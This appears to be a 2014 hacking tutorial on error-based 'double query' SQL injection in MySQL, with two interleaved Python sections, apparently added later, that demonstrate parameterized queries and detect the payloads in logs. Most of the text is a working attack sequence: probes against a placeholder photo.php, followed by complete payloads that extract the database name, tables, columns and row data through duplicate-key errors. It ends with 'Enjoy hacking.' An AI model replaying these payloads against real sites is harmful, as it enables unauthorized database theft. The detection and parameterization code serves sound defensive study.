After discussing Basic Injections, Union Based Injection, XPATH injection using ExtractValue and XPATH injection using UpdateXML, we can now move on to Sub Query injection.

Its scenario is very similar to XPATH. So you may wonder why we should use this one instead of XPATH, when that one is easier than this one?

The answer is right in front of you: the XPATH functions are not available in some versions of MySQL, and they may be filtered or locked by the admin. To get around that problem we use Sub Query Injection.

Let us start by testing the website.


www.vuln-web.com/photo.php?id=1/
Result: No Error

www.vuln-web.com/photo.php?id=1"
Result: No Error

www.vuln-web.com/photo.php?id=1'
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Now let us inspect the error more closely. The part MySQL reports is
''1'' LIMIT 0,1'

The single quotes at both ends are added by MySQL itself to quote the part of the query that contains the error. That means
'1'' LIMIT 0,1

is a part of the query. We can see our input there, 1', which caused the error because we entered one single quote and the web application added another one of its own. So we have to comment out the rest of the query to stop that error from occurring. For that we first have to imagine what the query could be:

Assumed query according to the error:
select field1,field2 from table1 where id='<our_input_here>' LIMIT 0,1;

Now let us try commenting out the rest of the query using our comment types.

www.vuln-web.com/photo.php?id=1'--
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1

www.vuln-web.com/photo.php?id=1'#
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

www.vuln-web.com/photo.php?id=1'/*
Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' LIMIT 0,1' at line 1

www.vuln-web.com/photo.php?id=1'-- -
Result: No Error

So the comment sequence that works in this query is '-- -'. Now that the tail is commented out, let us test whether the injection is really working. For that we will use the boolean AND operator.

Assumed query according to the error, with our input:
select field1,field2 from table1 where id='1' and true-- -' LIMIT 0,1;


We injected 1' and true-- -, so nothing after -- - is included in the query, and our query is actually

select field1,field2 from table1 where id='1' and true;


Here both conditions are true, so you should get the page normally, just as it was returned at the start. Now we will inject false and see whether it makes any difference.

select field1,field2 from table1 where id='1' and false;

This time the page won't load normally. It won't throw any error, but you won't see the normal page that loaded earlier with true. That means the injection is working.

Now from the injection point of view:

www.vuln-web.com/photo.php?id=1' and true-- -
Result: Normal page

www.vuln-web.com/photo.php?id=1' and false-- -
Result: The page didn't load as it normally does, because the query didn't return anything.
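The boolean test above, run against a constructed SQLite stand-in for the assumed query (an added example, not code from the original post): the string-built lookup reacts to the lone quote, the AND true/false pair and the '-- -' comment exactly as the page describes, while a parameterized lookup treats the same input as one plain id value. The table name, columns and row are assumptions.

```python
import sqlite3

# Constructed stand-in for the table behind photo.php (assumption: the page never
# shows the real schema). vulnerable_lookup builds the assumed query from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE table1 (id TEXT, field1 TEXT, field2 TEXT)")
    conn.execute("INSERT INTO table1 VALUES ('1', 'first photo', 'public')")
    return conn

def vulnerable_lookup(conn, user_input):
    # The id is spliced into the SQL string, so a quote ends the literal and
    # everything after it is parsed as SQL; '-- -' then comments out the tail.
    sql = "select field1,field2 from table1 where id='" + user_input + "' LIMIT 0,1"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, user_input):
    # Placeholder binding: the driver sends the value out of band, so the quote,
    # 'and true' and the comment marker are just characters inside one id value.
    sql = "select field1,field2 from table1 where id=? LIMIT 0,1"
    return conn.execute(sql, (user_input,)).fetchall()

def probe(lookup, conn, user_input):
    """Collapse a lookup to the three outcomes the page reads off the response."""
    try:
        rows = lookup(conn, user_input)
    except sqlite3.Error:
        return "error"
    return "rows" if rows else "empty"

# The probe sequence from the page (constructed inputs), run against both lookups.
PROBES = ["1", "1'", "1' and true-- -", "1' and false-- -"]

def compare():
    conn = make_db()
    return {p: (probe(vulnerable_lookup, conn, p), probe(safe_lookup, conn, p)) for p in PROBES}
```

Only the vulnerable lookup distinguishes true from false; the parameterized one returns nothing for every injected string, which is the behaviour a fix should produce.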

Now let us start finding out the number of columns.

www.vuln-web.com/photo.php?id=1' order by 1-- -
Result: No Error

www.vuln-web.com/photo.php?id=1' order by 1,2-- -
Result: No Error

www.vuln-web.com/photo.php?id=1' order by 1,2,3-- -
Result: No Error

www.vuln-web.com/photo.php?id=1' order by 1,2,3,4-- -
Result: Error : Unknown column '4' in 'order clause'

So the last column that worked without an error is the 3rd, which means we have 3 columns. First let us try Union Based Injection.

www.vuln-web.com/photo.php?id=-1' union select 1,2,3-- -

Remember to invalidate the first query, as I did by making the id -1; you can use the other ways discussed earlier to invalidate it so that it gives no output and the output of our injected query gets printed instead. But the application still didn't print any of the numbers on the page, which means it isn't outputting anything. In that case we could use XPATH Injection with UpdateXML or ExtractValue, but some versions of MySQL don't have those functions, or the admin has disabled them. So in that case we will use Sub Query injection, also called Double Query injection.

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((<Your Query here to return single row>),0x3a,floor(rand (0) *2))y from information_schema.tables group by y) x)-- -

You will get the output in the form of an error: grouping by a key built from rand(0) makes MySQL try to insert the same key twice into its temporary table, and the duplicate-key error echoes that key, including the result of our subquery. It looks like

Duplicate entry '<Your Output here>:1' for key 'group_key'
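As an added defender-side example (not part of the original post), the following scans constructed access-log lines for the probe sequence and the rand(0)/group by payload shown above, and checks whether a response echoes the duplicate-key error this technique depends on. The log format, the client address and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the technique above: rand(0)/group by collision, metadata tables, comment tails.
SIGNATURES = [
    ("rand_collision", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")),
    ("group_by", re.compile(r"group\s+by\s+\w+\s*\)")),
    ("count_star", re.compile(r"count\s*\(\s*\*\s*\)")),
    ("info_schema", re.compile(r"information_schema\.(tables|columns)")),
    ("comment_tail", re.compile(r"--\s-|--\s*$|#|/\*")),
    ("quote", re.compile(r"'")),
]
# Response-side leak: the MySQL error text the page uses as its output channel.
GROUP_KEY_LEAK = re.compile(r"Duplicate entry '.*' for key 'group_key'")
# Combined access-log format: client, request target and status are all we need.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def normalize(query_string):
    # Decode twice so %2527 still becomes a quote, then fold case and whitespace.
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(line):
    """Return client, status, matched signatures and a verdict for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    norm = normalize(target.partition("?")[2])
    hits = [name for name, rx in SIGNATURES if rx.search(norm)]
    if "rand_collision" in hits and "group_by" in hits:
        verdict = "double_query"   # the full error-based extraction payload
    else:
        verdict = "probe" if hits else "benign"   # quote/comment tests that precede it
    return {"client": client, "status": int(status), "hits": hits, "verdict": verdict}

def leaks_group_key(response_body):
    # True when the app echoes the duplicate-key error; a generic error page closes this channel.
    return GROUP_KEY_LEAK.search(response_body) is not None

def scan(lines):
    return [r for r in map(classify, lines) if r and r["verdict"] != "benign"]

# Constructed sample lines (not from the page): the probe sequence, then the payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Mar/2014:10:01:02 +0000] "GET /photo.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [23/Mar/2014:10:01:09 +0000] "GET /photo.php?id=1%27 HTTP/1.1" 200 611',
    '203.0.113.5 - - [23/Mar/2014:10:01:30 +0000] "GET /photo.php?id=1%27+and+true--+- HTTP/1.1" 200 5120',
    '203.0.113.5 - - [23/Mar/2014:10:02:44 +0000] "GET /photo.php?id=1%27+and+(select+1+from+(select+count(*),concat((select+database()),0x3a,floor(rand(0)*2))y+from+information_schema.tables+group+by+y)x)--+- HTTP/1.1" 200 640',
]
```

A 200 status on every line is the point: nothing here is a server error, so status-based alerting misses it and the query string itself has to be inspected.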

We can start our injection by getting the current database, then the tables, then the columns, and finally dumping the data.

If you have properly read the Death Row Injection post, I bet you can figure out the rest on your own. Still, I will show the injection sequence required.

Getting Database:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Tables:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Columns of any table:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name='<table_name_here>' limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Getting the Data from Columns:

www.vuln-web.com/photo.php?id=1' and (select 1 from (Select count(*),Concat((select concat(<column_1>,<column_2>) from <table_name_here> limit 0,1),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -

Well we are done...
Enjoy hacking.

Author : Zenodermus Javanicus
Date : 2014-03-23